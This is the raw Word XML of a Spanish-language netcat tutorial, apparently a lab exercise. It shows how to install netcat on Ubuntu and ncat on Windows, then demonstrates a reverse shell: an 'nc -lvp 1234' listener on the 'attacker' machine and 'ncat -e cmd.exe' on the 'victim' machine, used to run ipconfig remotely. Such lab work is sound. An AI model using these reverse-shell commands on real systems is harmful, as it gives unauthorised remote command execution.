    <w:p w14:paraId="3E733BD1" w14:textId="37FDD41C" w:rsidR="00CA7704" w:rsidRDefault="00E65C2A" w:rsidP="00CA7704">
      <w:r>
        <w:t>Netcat se usa en muchas auditorias de ciberseguridad ya que incluye varias funcionalidades como, por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A66F1A9" w14:textId="168C5BFD" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="00E65C2A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abrir puertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1C351" w14:textId="7F0BD0C0" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="00E65C2A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Escanear puertos y direcciones IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03545642" w14:textId="3664889A" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="00E65C2A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ver qué servicios están activos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59607A5C" w14:textId="1FBEF869" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="00E65C2A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Establecer conexiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844FD2A" w14:textId="77777777" w:rsidR="00E65C2A" w:rsidRPr="00CA7704" w:rsidRDefault="00E65C2A" w:rsidP="00E65C2A"/>
    <w:p w14:paraId="5B8D8CC7" w14:textId="26412D93" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="00CA7704">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Instalar_netcat_en"/>
      <w:bookmarkStart w:id="5" w:name="_Toc182474726"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t xml:space="preserve">Instalar netcat en </w:t>
      </w:r>
      <w:r w:rsidR="00844DC3">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="26BA17D5" w14:textId="6DB96408" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="009E303F">
      <w:r>
        <w:t>Para instalar el netcat, primero vamos a actualizar los paquetes del sistema con dos comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F708D" w14:textId="74D7F229" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="009E303F">
      <w:r>
        <w:t>El primero es para descargar los paquetes nuevos</w:t>
      </w:r>
      <w:r w:rsidR="002D5887">
        <w:t xml:space="preserve"> “sudo apt update”</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574D522C" w14:textId="68F108E0" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="00CA7704">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA7704">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260D5D55" wp14:editId="58E51F5D">
            <wp:extent cx="4038601" cy="862614"/>
            <wp:effectExtent l="19050" t="19050" r="1905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3032" cy="872104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent3"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE6E44" w14:textId="1E038C1B" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="00CA7704"/>
    <w:p w14:paraId="0922B896" w14:textId="0A9A5230" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="00CA7704">
      <w:r>
        <w:t>El segundo es para instalar los paquetes descargados</w:t>
      </w:r>
      <w:r w:rsidR="002D5887">
        <w:t xml:space="preserve"> “sudo apt upgrade”</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E81B3" w14:textId="3F20ABE4" w:rsidR="00CA7704" w:rsidRDefault="002D5887" w:rsidP="002D5887">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5887">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="636F264A" wp14:editId="0DEC10E7">
            <wp:extent cx="3371850" cy="8001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5" cy="807635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988DBF5" w14:textId="34512691" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="009E303F"/>
    <w:p w14:paraId="28414871" w14:textId="41420DDA" w:rsidR="002D5887" w:rsidRDefault="002D5887" w:rsidP="009E303F">
      <w:r>
        <w:t>Luego descargaremos el netcat usando el comando “apt-get install netcat”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A37D1" w14:textId="25365745" w:rsidR="002D5887" w:rsidRDefault="002D5887" w:rsidP="002D5887">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5887">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53B264C0" wp14:editId="29CFD54B">
            <wp:extent cx="3848098" cy="744793"/>
            <wp:effectExtent l="19050" t="19050" r="19685"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00" cy="754955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="92D050"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BEAE4F" w14:textId="06B63D7C" w:rsidR="002D5887" w:rsidRDefault="002D5887" w:rsidP="002D5887"/>
    <w:p w14:paraId="186177F8" w14:textId="62DE39AF" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="002D5887">
      <w:r>
        <w:t>Ahora pondremos el siguiente comando para comprobar que está instalado “nc -v”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A6BE9C" w14:textId="063BC42B" w:rsidR="002D5887" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006C1015">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DE15952" wp14:editId="0A8A9330">
            <wp:extent cx="4740910" cy="800691"/>
            <wp:effectExtent l="19050" t="19050" r="2159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040" cy="803584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77317E" w14:textId="5E1719AB" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="009E303F"/>
    <w:p w14:paraId="37408DE9" w14:textId="08B5D392" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="009E303F"/>
    <w:p w14:paraId="4282385E" w14:textId="6973A141" w:rsidR="00CA7704" w:rsidRDefault="00CA7704" w:rsidP="009E303F"/>
    <w:p w14:paraId="13FE2E3B" w14:textId="19404B54" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="009E303F"/>
    <w:p w14:paraId="52968A57" w14:textId="7446079D" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="009E303F"/>
    <w:p w14:paraId="15E6840E" w14:textId="4017D0AE" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="00E65C2A">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Instalar_netcat_en_1"/>
      <w:bookmarkStart w:id="7" w:name="_Toc182474727"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Instalar netcat en Windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6CAD7A5A" w14:textId="4DDCE839" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="009E303F">
      <w:r>
        <w:t xml:space="preserve">Para instalar netcat </w:t>
      </w:r>
      <w:r w:rsidR="00997747">
        <w:t xml:space="preserve">tendremos que descargar antes nmap. Para eso, iremos a este </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="windows" w:history="1">
        <w:r w:rsidR="00997747" w:rsidRPr="00997747">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00997747">
        <w:t xml:space="preserve"> y lo descargaremos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1814D0C7" w14:textId="27BE2202" w:rsidR="00997747" w:rsidRDefault="00997747" w:rsidP="00997747">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00997747">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC9E742" wp14:editId="27078CE3">
            <wp:extent cx="4112614" cy="3629025"/>
            <wp:effectExtent l="19050" t="19050" r="215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134" cy="3634778"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6AEECB" w14:textId="56ACB034" w:rsidR="00E65C2A" w:rsidRDefault="00E65C2A" w:rsidP="00E65C2A"/>
    <w:p w14:paraId="39F08C1D" w14:textId="473AF521" w:rsidR="00E65C2A" w:rsidRDefault="00997747" w:rsidP="006C1015">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Una vez descargado, lo ejecutaremos. Al ejecutarlo, se nos abre el instalador y lo primero que nos aparece es la licencia</w:t>
      </w:r>
      <w:r w:rsidR="006C1015">
        <w:t>, donde daremos a “I Agree”:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C1015" w:rsidRPr="006C1015">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34FBDC92" wp14:editId="343DF05D">
            <wp:extent cx="3545249" cy="2762250"/>
            <wp:effectExtent l="19050" t="19050" r="1714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7746" cy="2771987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDAC88F" w14:textId="534CDA0F" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015"/>
    <w:p w14:paraId="46564F8F" w14:textId="7837002E" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015"/>
    <w:p w14:paraId="710EDFBE" w14:textId="62AA5FC0" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015"/>
    <w:p w14:paraId="064BB00A" w14:textId="0C371A2E" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015"/>
    <w:p w14:paraId="38F41C8B" w14:textId="07F7E56E" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015"/>
    <w:p w14:paraId="4C2953C6" w14:textId="0423CE65" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Luego nos salen los componentes de nmap que se van a instalar. Importante confirmar que este seleccionado “ncat”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB1BD8C" w14:textId="3AECF8E4" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006C1015">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B8F81CB" wp14:editId="757F97BC">
            <wp:extent cx="3498178" cy="2657475"/>
            <wp:effectExtent l="19050" t="19050" r="266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557" cy="2667639"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent6"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30150464" w14:textId="6F68EFBF" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015"/>
    <w:p w14:paraId="27C265A1" w14:textId="20531DE5" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:r>
        <w:t>Después de eso, seleccionaremos la ubicación de nuestro PC donde instalarlo y le daremos a “Install”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFC8DE" w14:textId="33AA4BBC" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006C1015">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27282CEB" wp14:editId="6F1A2878">
            <wp:extent cx="3219450" cy="2466099"/>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6025" cy="2471136"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1670C02C" w14:textId="7E890C81" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="00E65C2A"/>
    <w:p w14:paraId="6AB1BDBA" w14:textId="3FC874FE" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="00E65C2A"/>
    <w:p w14:paraId="083D07BF" w14:textId="0E042057" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="00E65C2A">
      <w:r>
        <w:t>Una vez instalado, abriremos el “CMD”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5951B1" w14:textId="25CA217A" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006C1015">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F38E591" wp14:editId="006B0C79">
            <wp:extent cx="1562100" cy="476573"/>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5551" cy="480677"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672FC8B" w14:textId="645473DF" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015"/>
    <w:p w14:paraId="16EE263A" w14:textId="4C3775FD" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:r>
        <w:t>Ahora pondremos el siguiente comando para confirmar que está instalado “ncat -v”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07DDFD" w14:textId="02932604" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="006C1015">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006C1015">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62262950" wp14:editId="334B073D">
            <wp:extent cx="3629025" cy="612902"/>
            <wp:effectExtent l="19050" t="19050" r="9525"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337" cy="616501"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="92D050"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E75A86" w14:textId="3BF99ED2" w:rsidR="006C1015" w:rsidRDefault="006C1015" w:rsidP="00E65C2A"/>
    <w:p w14:paraId="07F4AD20" w14:textId="2D7E3659" w:rsidR="00981B19" w:rsidRDefault="00981B19" w:rsidP="00981B19">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc182474728"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Distintos usos del netcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="02E48B3E" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Reverse_Shell_con"/>
      <w:bookmarkStart w:id="10" w:name="_Toc182474729"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>Reverse Shell con netcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="14BE8445" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:r>
        <w:t>Hay dos formas de tener una reverse Shell con netcat. La primera es usando el parametro “-e” y la segunda es usando mkfifo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE50E21" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:r>
        <w:t>Para hacer la primera opción, en el equipo atacante (Ubuntu) pondremos lo siguiente “nc -lvp 1234”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BE845" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRPr="00445761" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00844DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">El - </w:t>
      </w:r>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El -l sirve para escuchar conexiones que se hagan a ese puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EA88A4" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El -p sirve para elegir el puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588D2CC" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRPr="00445761" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El -v sirve para que dé información más detallada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0BA012" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:r w:rsidRPr="00844DC3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342F080B" wp14:editId="0B546391">
            <wp:extent cx="5496692" cy="36200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362001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0208A2B7" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="45CB2624" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:r>
        <w:t>Luego en la maquina victima (Windows) escribiremos lo siguiente “ncat -e cmd.exe ip_a_escanear puerto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D830E58" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRPr="00445761" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">El -e sirve para abrir un programa instalado en el equipo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>al que</w:t>
      </w:r>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00445761">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e quiere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CA0296" w14:textId="77777777" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00844DC3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F7C75C9" wp14:editId="36AA64D0">
            <wp:extent cx="4105275" cy="325955"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="171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4115" cy="330627"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent4"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD20C4F" w14:textId="737B2EC6" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="57BE47AE" w14:textId="5B2A9CCC" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:r>
        <w:t>Con esto, ya tendríamos la reverse Shell creada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE37CC" w14:textId="6D8FC461" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00844DC3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F6DA11E" wp14:editId="489B6B40">
            <wp:extent cx="3267075" cy="787038"/>
            <wp:effectExtent l="19050" t="19050" r="9525"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6176" r="24738"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3316366" cy="798912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="9BBB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DF7B4EB" w14:textId="61569738" w:rsidR="00844DC3" w:rsidRDefault="00844DC3" w:rsidP="00844DC3"/>
    <w:p w14:paraId="5C73779C" w14:textId="259B545E" w:rsidR="00844DC3" w:rsidRDefault="00DF3D8B" w:rsidP="00844DC3">
      <w:r>
        <w:t>Ahora todo lo que escribamos en el “Ubuntu”(atacante) , se ejecuta en el “Windows” (victima). Por ejemplo, voy a poner el comando “ipconfig” y nos va a aparecer la ip del Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530057F7" w14:textId="41EA5235" w:rsidR="00DF3D8B" w:rsidRDefault="00DF3D8B" w:rsidP="00DF3D8B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF3D8B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64BAC65A" wp14:editId="0746B739">
            <wp:extent cx="3228975" cy="1796118"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="139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402" cy="1814155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560A281" w14:textId="41A1466B" w:rsidR="00DF3D8B" w:rsidRDefault="00DF3D8B" w:rsidP="00DF3D8B"/>
    <w:p w14:paraId="63174458" w14:textId="2825FDC3" w:rsidR="00DF3D8B" w:rsidRDefault="00DF3D8B" w:rsidP="00DF3D8B">
      <w:r>
        <w:t>Sé que es la IP de Windows porque si cierro la conexión con netcat y hago un “ipconfig” es la misma IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484F48F" w14:textId="3EEFCC4A" w:rsidR="00DF3D8B" w:rsidRDefault="00DF3D8B" w:rsidP="00DF3D8B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF3D8B">
        <w:rPr>
          <w:noProof/>
